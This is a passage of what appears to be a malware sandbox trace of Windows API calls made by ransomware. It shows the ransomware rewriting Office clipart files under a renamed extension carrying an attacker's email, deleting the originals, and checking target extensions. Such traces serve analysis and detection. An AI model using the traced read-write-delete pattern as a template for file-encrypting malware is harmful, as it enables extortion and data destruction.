Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63 [0273.538] lstrlenW (lpString=".jpg") returned 4 [0273.538] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.539] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=46936) returned 1 [0273.539] CloseHandle (hObject=0x2bc) returned 1 [0273.541] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf")) returned 0x20 [0273.541] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.541] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.541] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.542] GetLastError () returned 0x0 [0273.542] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xb758, lpOverlapped=0x0) returned 1 [0273.544] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xb760, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xb760, lpOverlapped=0x0) returned 1 [0273.551] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.551] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.551] SetEndOfFile (hFile=0x37c) returned 1 [0273.551] CloseHandle (hObject=0x37c) returned 1 [0273.551] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.551] SetEndOfFile (hFile=0x2bc) returned 1 [0273.554] CloseHandle (hObject=0x2bc) returned 1 [0273.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.554] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf")) returned 1 [0273.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63 [0273.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63 [0273.555] lstrlenW (lpString=".doc") returned 4 [0273.555] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.555] lstrlenW (lpString=".docx") returned 5 [0273.555] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0273.555] lstrlenW (lpString=".pdf") returned 4 [0273.555] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.555] lstrlenW (lpString=".xls") returned 4 [0273.555] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.555] lstrlenW (lpString=".xlsx") returned 5 [0273.555] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0273.555] lstrlenW (lpString=".ppt") returned 4 [0273.555] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63 [0273.555] lstrlenW (lpString=".zip") returned 4 [0273.555] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.555] lstrlenW (lpString=".rar") returned 4 [0273.555] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.555] lstrlenW (lpString=".bz2") returned 4 [0273.555] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.555] lstrlenW (lpString=".7z") returned 3 [0273.555] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63 [0273.555] lstrlenW (lpString=".dbf") returned 4 [0273.555] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63 [0273.555] lstrlenW (lpString=".1cd") returned 4 [0273.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned 63 [0273.556] lstrlenW (lpString=".jpg") returned 4 [0273.556] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.557] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=15760) returned 1 [0273.557] CloseHandle (hObject=0x2bc) returned 1 [0273.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf")) returned 0x20 [0273.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.557] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.557] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.557] GetLastError () returned 0x0 [0273.557] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3d90, lpOverlapped=0x0) returned 1 [0273.559] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3da0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3da0, lpOverlapped=0x0) returned 1 [0273.560] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.560] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.560] SetEndOfFile (hFile=0x37c) returned 1 [0273.560] CloseHandle (hObject=0x37c) returned 1 [0273.560] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.560] SetEndOfFile (hFile=0x2bc) returned 1 [0273.562] CloseHandle (hObject=0x2bc) returned 1 [0273.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf")) returned 1 [0273.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63 [0273.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63 [0273.562] lstrlenW (lpString=".doc") returned 4 [0273.562] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.562] lstrlenW (lpString=".docx") returned 5 [0273.562] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0273.562] lstrlenW (lpString=".pdf") returned 4 [0273.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.563] lstrlenW (lpString=".xls") returned 4 [0273.563] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.563] lstrlenW (lpString=".xlsx") returned 5 [0273.563] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0273.563] lstrlenW (lpString=".ppt") returned 4 [0273.563] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63 [0273.563] lstrlenW (lpString=".zip") returned 4 [0273.563] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.563] lstrlenW (lpString=".rar") returned 4 [0273.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.563] lstrlenW (lpString=".bz2") returned 4 [0273.563] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.563] lstrlenW (lpString=".7z") returned 3 [0273.563] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63 [0273.563] lstrlenW (lpString=".dbf") returned 4 [0273.563] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63 [0273.563] lstrlenW (lpString=".1cd") returned 4 [0273.563] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63 [0273.563] lstrlenW (lpString=".jpg") returned 4 [0273.563] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.564] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=28212) returned 1 [0273.564] CloseHandle (hObject=0x2bc) returned 1 [0273.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf")) returned 0x20 [0273.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.564] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.564] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.566] GetLastError () returned 0x0 [0273.566] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x6e34, lpOverlapped=0x0) returned 1 [0273.568] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x6e40, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x6e40, lpOverlapped=0x0) returned 1 [0273.569] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.569] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.569] SetEndOfFile (hFile=0x37c) returned 1 [0273.569] CloseHandle (hObject=0x37c) returned 1 [0273.569] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.569] SetEndOfFile (hFile=0x2bc) returned 1 [0273.571] CloseHandle (hObject=0x2bc) returned 1 [0273.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.571] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf")) returned 1 [0273.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63 [0273.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63 [0273.572] lstrlenW (lpString=".doc") returned 4 [0273.572] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.572] lstrlenW (lpString=".docx") returned 5 [0273.572] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0273.572] lstrlenW (lpString=".pdf") returned 4 [0273.572] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.572] lstrlenW (lpString=".xls") returned 4 [0273.572] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.572] lstrlenW (lpString=".xlsx") returned 5 [0273.572] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0273.572] lstrlenW (lpString=".ppt") returned 4 [0273.572] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63 [0273.572] lstrlenW (lpString=".zip") returned 4 [0273.572] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.572] lstrlenW (lpString=".rar") returned 4 [0273.572] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.572] lstrlenW (lpString=".bz2") returned 4 [0273.572] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.572] lstrlenW (lpString=".7z") returned 3 [0273.572] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63 [0273.572] lstrlenW (lpString=".dbf") returned 4 [0273.572] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63 [0273.572] lstrlenW (lpString=".1cd") returned 4 [0273.573] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090149.WMF") returned 63 [0273.573] lstrlenW (lpString=".jpg") returned 4 [0273.573] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.574] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=17638) returned 1 [0273.574] CloseHandle (hObject=0x2bc) returned 1 [0273.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf")) returned 0x20 [0273.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.574] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.574] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.574] GetLastError () returned 0x0 [0273.574] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x44e6, lpOverlapped=0x0) returned 1 [0273.576] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x44f0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x44f0, lpOverlapped=0x0) returned 1 [0273.577] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.577] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.577] SetEndOfFile (hFile=0x37c) returned 1 [0273.577] CloseHandle (hObject=0x37c) returned 1 [0273.577] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.577] SetEndOfFile (hFile=0x2bc) returned 1 [0273.579] CloseHandle (hObject=0x2bc) returned 1 [0273.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf")) returned 1 [0273.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63 [0273.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63 [0273.580] lstrlenW (lpString=".doc") returned 4 [0273.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString=".docx") returned 5 [0273.580] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0273.580] lstrlenW (lpString=".pdf") returned 4 [0273.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString=".xls") returned 4 [0273.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.580] lstrlenW (lpString=".xlsx") returned 5 [0273.580] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0273.580] lstrlenW (lpString=".ppt") returned 4 [0273.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63 [0273.580] lstrlenW (lpString=".zip") returned 4 [0273.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.580] lstrlenW (lpString=".rar") returned 4 [0273.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString=".bz2") returned 4 [0273.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString=".7z") returned 3 [0273.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63 [0273.580] lstrlenW (lpString=".dbf") returned 4 [0273.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63 [0273.580] lstrlenW (lpString=".1cd") returned 4 [0273.580] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF") returned 63 [0273.580] lstrlenW (lpString=".jpg") returned 4 [0273.580] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.581] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3332) returned 1 [0273.581] CloseHandle (hObject=0x2bc) returned 1 [0273.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf")) returned 0x20 [0273.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.581] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.581] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.582] GetLastError () returned 0x0 [0273.582] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xd04, lpOverlapped=0x0) returned 1 [0273.583] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xd10, lpOverlapped=0x0) returned 1 [0273.584] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.584] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, 